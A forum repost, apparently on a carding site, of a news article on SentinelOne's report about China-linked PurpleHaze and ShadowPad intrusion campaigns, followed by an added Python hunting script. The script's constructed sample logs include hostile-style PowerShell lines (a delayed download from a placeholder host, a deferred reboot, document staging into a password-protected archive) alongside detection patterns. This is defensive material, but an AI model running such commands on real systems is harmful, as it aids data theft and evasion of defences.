Carder.life

SentinelOne shares new details on China-linked breach attempt (http://txgate.io:443/showthread.php?t=51301192)

Artifact 06-10-2025 09:35 AM

<div id="post_message_796554">

SentinelOne has shared more details on an attempted supply chain attack by Chinese hackers through an IT services and logistics firm that manages hardware logistics for the cybersecurity firm.<br/>
<br/>
SentinelOne is an American endpoint protection (EDR/XDR) solutions provider that protects critical infrastructure in the country and numerous large enterprises.<br/>
<br/>
It is a high-value target for state actors, as compromising it could serve as a springboard to accessing downstream corporate networks and gaining insight into detection capabilities to develop evasion methods.<br/>
<br/>
SentinelLabs <a href="https://www.sentinelone.com/labs/top-tier-target-what-it-takes-to-defend-a-cybersecurity-company-from-todays-adversaries/" target="_blank">first reported</a> on the attempted attack in April, with a new report today describing the attack as part of a broader campaign targeting over 70 entities worldwide between June 2024 and March 2025.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/June/victims.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Targets of the campaign

</td>
</tr>
</table>
</div>The targets include organizations in government, telecommunications, media, finance, manufacturing, research, and IT sectors.<br/>
<br/>
The campaign is separated into two clusters. The first is 'PurpleHaze,' attributed to APT15 and UNC5174, covering a timeframe between September and October 2024.<br/>
<br/>
SentinelOne was targeted by both clusters, once for reconnaissance and once for supply chain intrusion.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/June/purple-hz.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

PurpleHaze (left) and ShadowPad (right) attacks on SentinelOne

</td>
</tr>
</table>
</div>SentinelOne suspects that the threat actors in both campaigns exploited vulnerabilities in exposed network devices, including Ivanti Cloud Service Appliances and Check Point gateways.<br/>
<br/>
"We suspect that the most common initial access vector involved the exploitation of Check Point gateway devices, consistent with <a href="https://www.orangecyberdefense.com/global/blog/cert-news/meet-nailaolocker-a-ransomware-distributed-in-europe-by-shadowpad-and-plugx-backdoors" target="_blank">previous research</a> on this topic," <a href="https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/" target="_blank">reports SentinelLabs</a>.<br/>
<br/>
"We also observed communication to ShadowPad C2 servers originating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential exploitation of these systems as well."<br/>
<br/>
<b><font size="4"><font color="White">PurpleHaze and ShadowPad campaigns</font></font></b><br/>
<br/>
The PurpleHaze attack wave attempted to breach SentinelOne in October 2024, where threat actors conducted scans on the company's internet-exposed servers over port 443, looking to map accessible services.<br/>
<br/>
The threat actors registered domains masquerading as SentinelOne infrastructure, such as sentinelxdr[.]us and secmailbox[.]us.<br/>
<br/>
Based on evidence from other targets, including a South Asian government, successful attacks used the GOREshell backdoor, which was dropped on network-exposed endpoints using zero-day exploits.<br/>
<br/>
The more recent activity cluster is 'ShadowPad,' conducted by APT41 between June 2024 and March 2025.<br/>
<br/>
The threat actors attempted what is believed to be a supply chain attack on SentinelOne in early 2025, where APT41 used the ShadowPad malware, obfuscated via ScatterBrain, against an IT services and logistics company working with the cybersecurity company.<br/>
<br/>
The attackers delivered the malware to the target via PowerShell, which used a 60-second delay to evade sandbox environments. The malware then scheduled a system reboot after 30 minutes to clear traces in memory.<br/>
<br/>
Next, the hackers deployed the open-source remote access framework 'Nimbo-C2' to provide a wide range of <a href="https://github.com/itaymigdal/Nimbo-C2?tab=readme-ov-file#features" target="_blank">remote capabilities</a>, including screenshot capturing, PowerShell command execution, file operations, UAC bypass, and more.<br/>
<br/>
The attackers also used a PowerShell-based exfiltration script that performs a recursive search for sensitive user documents, archives them in a password-locked 7-Zip archive, and exfiltrates them.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/June/pos-exfil.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

PowerShell data exfiltration script

</td>
</tr>
</table>
</div>SentinelOne comments that the threat actors' goals remain unclear, but a supply chain compromise is the most likely scenario.<br/>
<br/>
The cybersecurity company thoroughly examined its assets and reported that no compromise had been detected on SentinelOne software or hardware.<br/>
<br/>
"This post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries and public sector organizations, including cybersecurity vendors themselves," concludes SentinelOne.<br/>
<br/>
"The activities detailed in this research reflect the strong interest these actors have in the very organizations tasked with defending digital infrastructure."<br/>
<br/>
<a href="https://www.bleepingcomputer.com/news/security/sentinelone-shares-new-details-on-china-linked-breach-attempt/" target="_blank">@ BleepingComputer </a>
</div>
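A defender's hunting check for the three PowerShell behaviours the article attributes to the ShadowPad intrusion (a long pause before a download, a reboot deferred well into the future, and recursive document collection into a password-protected 7-Zip archive). This is an added example, not code from the article, from SentinelOne's report or from the forum post; the script-block log entries, hostnames, URLs and thresholds are constructed for illustration.

```python
"""Hunting heuristics over PowerShell script-block log entries (host, script text)."""
import re

# Constructed sample entries (not taken from the article or from SentinelOne).
SAMPLE_SCRIPT_BLOCKS = [
    ("host-a", "Start-Sleep -Seconds 60; Invoke-WebRequest -Uri "
               "http://staging.invalid/s.dat -OutFile $env:TEMP\\s.dat"),
    ("host-a", "shutdown /r /t 1800"),
    ("host-b", "Get-ChildItem C:\\Users -Recurse -Include *.docx,*.pdf | "
               "Copy-Item -Destination $env:TEMP\\d; & 7z.exe a -pSeCrEt out.7z $env:TEMP\\d"),
    ("host-c", "Get-ChildItem C:\\Logs -Recurse | Remove-Item"),           # benign: recursion only
    ("host-d", "Start-Sleep -Seconds 5; Get-Service | Out-File svc.txt"),  # benign: short sleep
]

SLEEP_RE = re.compile(r"Start-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.I)
NET_RE = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|iwr\b|DownloadFile|DownloadString", re.I)
# Lookaheads accept the switches in either order; group 1 is the /t delay in seconds.
REBOOT_RE = re.compile(r"shutdown(?:\.exe)?\s+(?=.*[/-]r\b)(?=.*[/-]t\s+(\d+))", re.I)
RECURSE_RE = re.compile(r"-Recurse\b", re.I)
# 7-Zip switches are case-sensitive, so -p (password) is matched without re.I.
SEVENZIP_RE = re.compile(r"7z(?:\.exe)?\s+a\b.*\s-p\S+")

def indicators(script: str) -> set[str]:
    """Return the behaviour labels that a single script block triggers."""
    hits = set()
    m = SLEEP_RE.search(script)
    # A pause of a minute or more before any network fetch: the sandbox-evasion delay.
    if m and int(m.group(1)) >= 60 and NET_RE.search(script):
        hits.add("delayed_download")
    m = REBOOT_RE.search(script)
    # A reboot scheduled at least 10 minutes out, consistent with flushing in-memory traces.
    if m and int(m.group(1)) >= 600:
        hits.add("scheduled_reboot")
    # Recursive file collection combined with a password-protected 7-Zip archive.
    if RECURSE_RE.search(script) and SEVENZIP_RE.search(script):
        hits.add("encrypted_archive_staging")
    return hits

def hunt(entries) -> dict[str, list[str]]:
    """Aggregate indicators per host; hosts with no hits are omitted."""
    per_host: dict[str, set[str]] = {}
    for host, script in entries:
        hits = indicators(script)
        if hits:
            per_host.setdefault(host, set()).update(hits)
    return {h: sorted(s) for h, s in sorted(per_host.items())}

if __name__ == "__main__":
    for host, labels in hunt(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{host}: {', '.join(labels)}")
```

Each label on its own is noisy on a real fleet; the value is in a host accumulating several of them within a short window, so feed the per-host output into whatever correlation your SIEM already does.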

